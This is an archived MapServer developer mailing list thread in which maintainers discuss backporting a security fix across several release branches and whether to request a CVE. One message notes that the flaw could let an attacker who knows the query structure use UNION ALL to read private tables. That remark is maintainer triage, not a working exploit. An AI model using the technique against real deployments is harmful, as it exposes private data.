[mapserver-dev] [motion] release 5.6.9, 6.0.4, 6.2.2 and 6.4.1

Lime, Steve D (MNIT) Steve.Lime at state.mn.us
Tue Dec 31 09:14:24 PST 2013 

Ah, true and combined with a configuration that sets no limitations on output (e.g. 'gml_items' 'all') there's your problem. --Steve
 
________________________________________
From: Even Rouault [even.rouault at mines-paris.org]
Sent: Tuesday, December 31, 2013 11:10 AM
To: mapserver-dev at lists.osgeo.org
Cc: Lime, Steve D (MNIT); thomas bonfort; Sebastiaan Couwenberg
Subject: Re: [mapserver-dev] [motion] release 5.6.9, 6.0.4, 6.2.2 and 6.4.1

Le mardi 31 décembre 2013 18:06:08, Lime, Steve D (MNIT) a écrit :
> Would be good to hear from Even. I think Thomas is correct. One can't
> manipulate the table list, nor can multiple statements be strung together.
> We're backporting to multiple branches out of an abundance of caution.

If you know the exact query structure (which is not difficult to get), you could
UNION ALL with content from other (possibly intended to be private) tables.

> --Steve
>
> ________________________________________
> From: mapserver-dev-bounces at lists.osgeo.org
> [mapserver-dev-bounces at lists.osgeo.org] on behalf of thomas bonfort
> [thomas.bonfort at gmail.com] Sent: Tuesday, December 31, 2013 9:02 AM
> To: Sebastiaan Couwenberg
> Cc: MapServer Dev Mailing List
> Subject: Re: [mapserver-dev] [motion] release 5.6.9, 6.0.4, 6.2.2 and 6.4.1
>
> Bas,
> My personal opinion is that a CVE wouldn't be needed as the
> vulnerability is not exploitable other than to return unfiltered data
> from the table, something that could/can already be done in a "valid"
> way by requesting an infinite time range. Again, this is my personal
> understanding, and if incorrect would indeed require a CVE.
>
> I'll pass the buck down to someone more knowledgeable of the issue to
> make the final call...
>
> regards,
> thomas
>
> On 31 December 2013 15:26, Sebastiaan Couwenberg <sebastic at xs4all.nl> wrote:
> > Have you considered requesting a CVE for the vulnerability to ease
> > tracking the patching of it by the various distributions?
> >
> > http://cve.mitre.org/
> >
> > Kind Regards,
> >
> > Bas
> >
> >
> > _______________________________________________
> > mapserver-dev mailing list
> > mapserver-dev at lists.osgeo.org
> > http://lists.osgeo.org/mailman/listinfo/mapserver-dev
>
> _______________________________________________
> mapserver-dev mailing list
> mapserver-dev at lists.osgeo.org
> http://lists.osgeo.org/mailman/listinfo/mapserver-dev
>
>
> _______________________________________________
> mapserver-dev mailing list
> mapserver-dev at lists.osgeo.org
> http://lists.osgeo.org/mailman/listinfo/mapserver-dev

--
Geospatial professional services
http://even.rouault.free.fr/services.html

More information about the mapserver-dev mailing list